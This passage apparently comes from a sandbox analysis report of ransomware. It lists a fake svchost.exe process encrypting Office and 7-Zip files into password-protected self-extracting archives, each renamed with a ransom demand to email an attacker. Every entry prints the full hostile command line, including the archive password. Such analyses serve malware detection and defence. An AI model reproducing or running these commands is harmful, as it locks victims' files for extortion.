  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\branding.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\branding.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2564
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUI.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUISet.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUISet.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1076
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2020
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUI.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1752
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUISet.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUISet.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1860
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1264
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\AccessMUI.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\AccessMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1416
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\branding.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\branding.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2344
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\AccessMUISet.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\AccessMUISet.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1740
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2420
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\History.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\History.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:3056
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\af.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\af.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2404
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\an.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\an.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2052
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ar.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ar.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2800
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ast.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ast.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2472
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\az.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\az.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2784
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ba.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ba.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\be.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\be.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2636
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\bg.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\bg.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2692
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\bn.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\bn.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:344
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\br.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\br.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2768
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ca.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ca.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2960
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\co.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\co.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:532
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\cs.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\cs.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2932
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\cy.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\cy.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\da.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\da.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1388
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\de.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\de.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1956
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\el.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\el.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:768
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\eo.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\eo.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2368
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\es.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\es.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:2256
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\et.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\et.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2112
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\eu.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\eu.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1564
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ext.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ext.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1324
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\fa.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\fa.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2464
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\fi.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\fi.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3008
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\fr.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\fr.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3020
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\fur.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\fur.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1876
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\fy.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\fy.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1096
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ga.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ga.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2028
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\gl.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\gl.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2452
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\gu.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\gu.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2920
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\he.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\he.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2664
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\hi.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\hi.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1240
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\hr.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\hr.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1552
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\hu.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\hu.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1416
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\hy.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\hy.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2072
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\id.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\id.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1740
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\io.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\io.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1816
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\is.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\is.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2872
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\it.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\it.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3056
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ja.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ja.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1944
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ka.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ka.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1148
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\kaa.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\kaa.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2740
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\kab.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\kab.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2992
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\kk.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\kk.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2976
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ko.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ko.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2640
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ku-ckb.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ku-ckb.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2352
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ku.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ku.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2312
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ky.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ky.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2236
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\lij.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\lij.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2816
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\lt.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\lt.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2792
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\lv.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\lv.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:380
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\mk.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\mk.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:968
- C:\ProgramData\msvkp\svchost.exe
